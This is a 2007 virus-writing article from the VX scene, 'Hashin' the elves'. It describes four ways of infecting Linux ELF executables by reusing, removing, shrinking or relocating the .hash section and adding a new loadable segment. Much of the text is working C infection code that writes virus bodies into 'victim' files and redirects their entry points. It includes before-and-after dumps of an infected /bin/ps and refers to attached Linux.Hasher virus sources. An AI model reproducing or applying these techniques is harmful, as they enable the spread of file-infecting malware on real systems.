Hashin' the elves
herm1t
Hashin' the elves herm1t October 2007 Contents Introduction 0 What .hash is needed for? 0 How to use the examples from this article? A. Making "dummy" hash B. Removing .hash C. Decreasing hash table size D. Shrink hash and add the new segment References -Introduction- One day I was looking through the ELF files with objdump and called my attention to .hash section, and thought: gee, can't we take some advantage of it? Nice section after all. Located in the code segment. Could it be shrinked or removed? In this article I want to share my findings. What .hash is needed for? Hash table is used to accelerate the access to the symbol table (.dynsym). Arranged in the following way (every element is Elf32_Word): [ nbuckets ] [ nchains ] [ buckets[0] ] ......................... [ buckets[nbuckets-1] ] [ chains[0] ] ......................... [ chains[nchains - 1] ] nbuckets - arbitrary number (greater than zero and lesser than nchains, preferably a prime - for more regular distribution of values in the table), nchains is equal to the number of symbols). glibc uses the following function to lookup the symbols by name (elf/do-lookup.h): for (symidx = map->l_buckets[hash % map->l_nbuckets]; symidx != STN_UNDEF; symidx = map->l_chain[symidx]) { sym = &symtab[symidx]; ... if (sym != ref && strcmp (strtab + sym->st_name, undef_name)) /* Not the symbol we are looking for. */ continue; ... Which is to say: Calculate the hash of name (the elf_hash function introduced in ELF format specification) Take the value from the buckets[hash % nbuckets] as the index of symbol ( symtab located in .dynsym) Compare the symbol's name, may it be a collision? (strtab located in .dynstr) In the case of false match, look through the chains array If the index is equal to zero (STN_UNDEF) - we're screwed now, symbol not found I will try to illustrate this with an example of searching the strlen symbol in /bin/ps from my system: (*) elf_hash("strlen") = 45 .hash .dynsym .dynstr offset +----+ 0 nbuckets | 67 | 4 nchains | 74 | +----+ 8 buckets 0 | 0 | : : : : : : 188 (*)----> 45 | 60 | ----> dynsym[60].st_name ---> "isatty" (no match) 192 46 | 0 | / 196 47 | 0 | / : : : / 272 66 | 32 | / +----+ / __________/ / / +----+ 276 chains / 0 | 0 | : / : : 464 | 47 | 31 |-----> dynsym[31].st_name ---> "strlen" (found!) : | ^ : : : | | : | \_____________ : | \ : | : : \ 516 +--> 60 | 47 | ----> dynsym[47].st_name ---> "strdup" (no match) 520 61 | 0 | : : : 568 73 | 0 | : +----+ If you still can't pick it up, check the description of ELF format [1]. How to use the examples from this article? We first assume that the victim file was already found, checked for validity, opened for read/write (handle - h, length - l), mapped into memory (mapping - m, ELF header - ehdr). All examples are in C. I also wrote four versions (chapter and version numeration are identical) of demo virus (Linux.Hasher) for those who prefer assembly or just want to look the propposed methods of infection in action. Defined macros: #define FOR_EACH_PHDR for (i = 0, phdr = (Elf32_Phdr*)(m + ehdr->e_phoff); i < ehdr->e_phnum; i++, phdr++) #define FOR_EACH_SHDR for (i = 0, shdr = (Elf32_Shdr*)(m + ehdr->e_shoff); i < ehdr->e_shnum; i++, shdr++) #define MAKE_HOLE(off,size) do { \ ftruncate(h,l+size); \ m = mremap(m,l,l + size, 0); \ if (m == MAP_FAILED) { \ perror("MAP FAILED!"); \ goto fini_close; \ } \ if (off < l) \ memmove(m+off+size, m+off, l-off); \ l += size; \ } while(0) #define SHIFT_SHDRS(offset,delta) do { \ if (ehdr->e_shoff >= offset) \ ehdr->e_shoff += delta; \ FOR_EACH_SHDR \ if (shdr->sh_offset >= offset) \ shdr->sh_offset += delta; \ } while(0) A. Making "dummy" hash At first, I just tried to remove the corresponding section, but due to dumb mistake it was no-go (more about that in the next chapter). And I thought, suppose we constructed a hash of minimal size such that do_lookup will always fail? Will the file mutilated in such a way work? It will. Let set nbuckets to 1 (x % 1 = 0) and buckets[0] to 0 (STN_UNDEF). That's all, hash doesn't work, no more hits. The rest of space in the section (section size - 12 bytes) is free. NB! Setting nbuckets to zero will lead to Floating point exception in do_lookup_x (/lib/ld-linux.so), it is small wonder in that, isn't it? uint32_t *hash; /* find hash section */ FOR_EACH_SHDR if (shdr->sh_type == SHT_HASH) { sh = shdr; break; } assert(sh != NULL); /* do we have enough space? */ assert(code_len < sh->sh_size - 12); hash = (uint32_t*)(m + sh->sh_offset); memset(hash, 0x00, sh->sh_size); /* nbuckets = 1, so buckets[hash % 1] = buckets[0] = STN_UNDEF */ hash[0] = 1; memcpy(&hash[3], code, code_len); ehdr->e_entry = sh->sh_addr + 12; B. Removing .hash When I tried to remove hash, I tried to rename the section and clog up the pointer of type DT_HASH in .dynamic, indeed the type of section should be changed in the Section Header Tbale (SHT) from SHT_HASH to SHT_PROGBITS (why not, it approaches reality), or to SHT_NULL (objdump will not show it). Clean .dynamic also (this step is optional): int dynsz; Elf32_Dyn *dyn; /* save pointer to the .hash entry in the SHT and get dynamic */ FOR_EACH_SHDR { if (shdr->sh_type == SHT_HASH) sh = shdr; /* optional */ if (shdr->sh_type == SHT_DYNAMIC) { dynsz = shdr->sh_size / sizeof(Elf32_Dyn); dyn = (Elf32_Dyn*)(m + shdr->sh_offset); } } assert(sh != NULL); /* do we have enough space? */ assert(code_len < sh->sh_size); /* remove DT_HASH from dynamic section (optional) */ for (i = 0; i < dynsz; i++) if (dyn[i].d_tag == DT_HASH) { memmove(&dyn[i], &dyn[i+1], (dynsz - i - 2) * sizeof(Elf32_Dyn)); break; } /* copy our code */ memcpy(m + sh->sh_offset, code, code_len); /* change .hash' type */ sh->sh_type = SHT_PROGBITS; /* change entry point */ ehdr->e_entry = sh->sh_addr; Linux.Hasher.b doesn't clean the dynamic C. Decreasing hash table size It isn't neccessary to remove hash completely, let's try to reduce its size, such that both new hash and our virus will fit in the section. This method isn't a very practical, because there are not too many files with large hash in the system, but the method of building the hash would come pat latter. Without hesitation, I got the code from TCC [2]. Here is slightly edited version: unsigned long elf_hash(const unsigned char *name) { unsigned long h = 0, g; while (*name) { h = (h << 4) + *name++; if (g = h & 0xf0000000) h ^= g >> 24; h &= ~g; } return h; } void build_hash(uint32_t *hash, int nbuckets, int nchains, Elf32_Sym *sym, char *str) { uint32_t i, h, *buckets, *chains; buckets = hash + 2; chains = buckets + nbuckets; hash[0] = nbuckets; hash[1] = nchains; for (i = 1; i < nchains; i++) { h = elf_hash(str + sym[i].st_name) % nbuckets; if (buckets[h] == 0) buckets[h] = i; else { h = buckets[h]; while (chains[h] != 0) h = chains[h]; chains[h] = i; } } } Don't forget to make memset(hash, 0, size_of_hash_section);! Minimal, maximal and average value of nbuckets for files from /bin: $ for i in /bin/*; do ./hstat $i; done|awk 'BEGIN{min=10000;max=0;n=0;s=0;} /^[0-9]/{if($1<min)min=$1;if($1>max)max=$1;s+=$1;n++}END{print min,max,s/n}' 3 1031 87.1304 Well, what is there to do Make sure that hash is large enough (nbuckets - (virus_size + 3) / 4 > 0) Decrease nbuckets by the length of virus in dwords Build new hash Write the virus code at the end of section By the way, the sh_link field can be used to find the needed sections: Section Headers: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [ 0] NULL 00000000 000000 000000 00 0 0 0 [ 1] .interp PROGBITS 08047134 000134 000013 00 A 0 0 1 [ 2] .note.ABI-tag NOTE 08047148 000148 000020 00 A 0 0 4 [ 3] .dynstr STRTAB 08047168 000168 00030a 00 A 0 0 1 <----+ [ 4] .gnu.liblist GNU_LIBLIST 08047474 000474 00003c 14 A 3 0 4 | [ 5] .gnu.conflict RELA 080474b0 0004b0 00012c 0c A 7 0 4 | [ 6] .hash HASH 08048168 001168 00023c 04 A 7 0 4 ---+ | [ 7] .dynsym DYNSYM 080483a4 0013a4 0004a0 10 A 3 1 4 <--+ | +-------------+ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . As thus: Elf32_Sym *sym = NULL; char *str = NULL; FOR_EACH_SHDR if (shdr->sh_type == SHT_HASH) { sh = shdr; break; } assert(sh != NULL); shdr = (Elf32_Shdr*)(m + ehdr->e_shoff); u = sh->sh_link; sym = (Elf32_Sym*)(m + shdr[u].sh_offset); u = shdr[u].sh_link; str = (char*)(m + shdr[u].sh_offset); uint32_t *hash = (uint32_t*)(m + sh->sh_offset), nb = hash[0], nc = hash[1]; assert( (nb - (code_len + 3)/4) > 1); memset(m + sh->sh_offset, 0, (nb + nc + 2)*4); nb -= (code_len + 3)/4; build_hash(hash, nb, nc, sym, str); t = (2 + nb + nc)*4; memcpy(m + sh->sh_offset + t, code, code_len); ehdr->e_entry = sh->sh_addr + t; Let's look how the hash table changed: BEFORE Name 'sigfillset', hash 0d06a614 buckets[12]=1 ... 1 (sigfillset) -> 1 Name 'getgrnam', hash 0cae92ad buckets[61]=57 ... 57 (free) ... 48 (lookup_wchan) ... 30 (escape_command) ... 2 (getgrnam) -> 2 skipped Name '__gmon_start__', hash 0f4d007f buckets[35]=72 ... 72 (__gmon_start__) -> 72 Name 'strcpy', hash 07ab8a79 buckets[5]=73 ... 73 (strcpy) -> 73 AFTER 27 hash buckets, 74 chains Name 'sigfillset', hash 0d06a614 buckets[1]=1 ... 1 (sigfillset) -> 1 Name 'getgrnam', hash 0cae92ad buckets[7]=2 ... 2 (getgrnam) -> 2 skipped Name '__gmon_start__', hash 0f4d007f buckets[6]=27 ... 27 (getpagesize) ... 35 (readtask) ... 67 (fwrite) ... 72 (__gmon_start__) -> 72 Name 'strcpy', hash 07ab8a79 buckets[23]=6 ... 6 (strchr) ... 18 (signal_number_to_name) ... 59 (get_pid_digits) ... 73 (strcpy) -> 73 D. Shrink hash and add the new segment I hope, that everybody familiar with the method of ELF file infection, that out of mere freak is called "additional" code segment [3], although in point of fact due to impossibility to add new entry to the segment table (Program Header Table, PHT), the entry of type PT_NOTE replaced with PT_LOAD. We already knew how to find a bit of space in the code segment (where the PHT resides), and nothing prevent us from increasing the table size, and really add a segment without detracting anything in any way. What is there to do: Look through the section table and memorize all needed pointers Build new hash table with nbuckets lessen by 8 elements (this give us 32 bytes (sizeof(Elf32_Phdr)) in code segment) Shift all sections, starting from .hash and till and including the first (not zero) by 32 bytes (increase sh_offset and sh_addr in SHT) If the address of the segment in PHT is equal to the address of section, fix PHT (these are PT_INTERP/.interp, PT_NOTE / .note.ABI-tag) If the address of pointer in the dynamic array is equal to the address of section, fix it also (it holds for DT_HASH/.hash, DT_SYMTAB/.dynsym etc) Increase the number of PHT entries (ehdr->e_phnum++) and the size of PT_PHDR segment in file and in memory (ph->p_filesz += 32; ph->p_memsz+=32) Separate PHT after the last PT_LOAD and add another one Father on, do the same as in the case of PT_NOTE replacement 0 Select the address for the new segment (in our case - minimal address - 2 pages) 0 Write the virus body to the end of file (Linux.Hasher.d does this) (or after the last loadable segment like in the example below) 0 Fill the PHT entry Like so: Elf32_Dyn *dyn = NULL; Elf32_Sym *sym = NULL; char *str = NULL; int hn, dynsz; FOR_EACH_SHDR { if (shdr->sh_type == SHT_DYNAMIC) { dyn = (Elf32_Dyn*)(m + shdr->sh_offset); dynsz = shdr->sh_size / sizeof(Elf32_Dyn); } if (shdr->sh_type == SHT_HASH) { sh = shdr; hn = i; } if (shdr->sh_type == SHT_DYNSYM) { sym = (Elf32_Sym*)(m + shdr->sh_offset); str = m + ((Elf32_Shdr*)(m + ehdr->e_shoff))[shdr->sh_link].sh_offset; } } assert(sh != NULL); assert(dyn != NULL); uint32_t *hash = (uint32_t*)(m + sh->sh_offset); assert(hash[0] > 9); /* reduce hash size */ uint32_t nb, nc; nb = hash[0]; nc = hash[1]; memset(hash, 0, (2 + nb + nc) * 4); nb -= 8; build_hash(hash, nb, nc, sym, str); sh->sh_size -= 32; /* shift sections */ int j, k; for (k = hn, shdr = (Elf32_Shdr*)(m + ehdr->e_shoff); k > 0; k--) { memmove(m + shdr[k].sh_offset + 32, m + shdr[k].sh_offset, shdr[k].sh_size); /* fix PT_INTERP, PT_NOTE ... */ FOR_EACH_PHDR if (phdr->p_vaddr == shdr[k].sh_addr) { phdr->p_vaddr += 32; phdr->p_paddr += 32; phdr->p_offset += 32; break; } /* fix .dynamic */ for (j = 0; dyn[j].d_tag != DT_NULL; j++) if (dyn[j].d_un.d_ptr == shdr[k].sh_addr) dyn[j].d_un.d_ptr += 32; shdr[k].sh_addr += 32; shdr[k].sh_offset += 32; } /* find min va (t), index of last PT_LOAD (u) and PT_PHDR (ph) */ t = 0xffffffff; FOR_EACH_PHDR { if (phdr->p_vaddr != 0 && phdr->p_vaddr < t) t = phdr->p_vaddr; if (phdr->p_type == PT_LOAD) u = i; if (phdr->p_type == PT_PHDR) ph = phdr; } ASSERT(t != 0xffffffff); /* fix PT_PHDR */ ph->p_filesz += 32; ph->p_memsz += 32; /* add new PHT entry */ ehdr->e_phnum++; phdr = (Elf32_Phdr*)(m + ehdr->e_phoff); memmove(&phdr[u + 2], &phdr[u + 1], (ehdr->e_phnum - u - 1) * sizeof(Elf32_Phdr)); v = phdr[u].p_offset + phdr[u].p_filesz; ph = &phdr[u + 1]; ph->p_type = PT_LOAD; ph->p_flags = PF_R|PF_X; ph->p_align = 0x1000; ph->p_offset = v; ph->p_filesz = ph->p_memsz = code_len; ph->p_vaddr = ph->p_paddr = t - 2 * PAGE_SIZE + (v & (PAGE_SIZE - 1)); MAKE_HOLE(v, PAGE_SIZE); memset(m + v, 0x90, PAGE_SIZE); memcpy(m + v, code, code_len); SHIFT_SHDRS(v, PAGE_SIZE); /* change entry point */ ehdr->e_entry = ph->p_vaddr; The changes in the file (/bin/ps + Linux.Hasher.d): Before infection Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align PHDR 0x000034 0x08047034 0x08047034 0x00100 0x00100 R E 0x4 INTERP 0x000134 0x08047134 0x08047134 0x00013 0x00013 R 0x1 [Requesting program interpreter: /lib/ld-linux.so.2] LOAD 0x000000 0x08047000 0x08047000 0x0ff88 0x0ff88 R E 0x1000 LOAD 0x010000 0x08057000 0x08057000 0x002fc 0x20654 RW 0x1000 DYNAMIC 0x010014 0x08057014 0x08057014 0x000d0 0x000d0 RW 0x4 NOTE 0x000148 0x08047148 0x08047148 0x00020 0x00020 R 0x4 GNU_EH_FRAME 0x00ff38 0x08056f38 0x08056f38 0x00014 0x00014 R 0x4 GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4 Section Headers: ... [ 1] .interp PROGBITS 08047134 000134 000013 00 A 0 0 1 [ 2] .note.ABI-tag NOTE 08047148 000148 000020 00 A 0 0 4 [ 3] .dynstr STRTAB 08047168 000168 00030a 00 A 0 0 1 [ 4] .gnu.liblist GNU_LIBLIST 08047474 000474 00003c 14 A 3 0 4 [ 5] .gnu.conflict RELA 080474b0 0004b0 00012c 0c A 7 0 4 [ 6] .hash HASH 08048168 001168 00023c 04 A 7 0 4 ... Dynamic section at offset 0x10014 contains 25 entries: 0x00000004 (HASH) 0x8048168 0x00000005 (STRTAB) 0x8047168 ... 0x6ffffef9 (GNU_LIBLIST) 0x8047474 ... 0x6ffffef8 (GNU_CONFLICT) 0x80474b0 After Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align PHDR 0x000034 0x08047034 0x08047034 0x00120 0x00120 R E 0x4 INTERP 0x000154 0x08047154 0x08047154 0x00013 0x00013 R 0x1 [Requesting program interpreter: /lib/ld-linux.so.2] LOAD 0x000000 0x08047000 0x08047000 0x0ff88 0x0ff88 R E 0x1000 LOAD 0x010000 0x08057000 0x08057000 0x002fc 0x20654 RW 0x1000 LOAD 0x01107c 0x0804607c 0x0804607c 0x003e8 0x003e8 R E 0x1000 DYNAMIC 0x010014 0x08057014 0x08057014 0x000d0 0x000d0 RW 0x4 NOTE 0x000168 0x08047168 0x08047168 0x00020 0x00020 R 0x4 GNU_EH_FRAME 0x00ff38 0x08056f38 0x08056f38 0x00014 0x00014 R 0x4 GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4 Section Headers: ... [ 1] .interp PROGBITS 08047154 000154 000013 00 A 0 0 1 [ 2] .note.ABI-tag NOTE 08047168 000168 000020 00 A 0 0 4 [ 3] .dynstr STRTAB 08047188 000188 00030a 00 A 0 0 1 [ 4] .gnu.liblist GNU_LIBLIST 08047494 000494 00003c 14 A 3 0 4 [ 5] .gnu.conflict RELA 080474d0 0004d0 00012c 0c A 7 0 4 [ 6] .hash HASH 08048188 001188 00021c 04 A 7 0 4 ... Dynamic section at offset 0x10014 contains 25 entries: 0x00000004 (HASH) 0x8048188 0x00000005 (STRTAB) 0x8047188 ... 0x6ffffef9 (GNU_LIBLIST) 0x8047494 ... 0x6ffffef8 (GNU_CONFLICT) 0x80474d0 To stop this kind of infection from working it is sufficient to place .hash not before, but after the code and data sections (they cannot be moved), that however will not interfere with the previous variants. Properly speaking, that is all. Any comments are welcome. herm1t@vx.netlux.org The sources of Linux.Hasher (a,b,c,d) attached. References 1. Tool Interface Standard (TIS) Executable and Linking Format (ELF) Specification Version 1.2 (May 1995) 2. Tiny C Compiler http://fabrice.bellard.free.fr/tcc/ 3. Alexander Bartolich "The ELF Virus Writing HOWTO" (Feb 2003)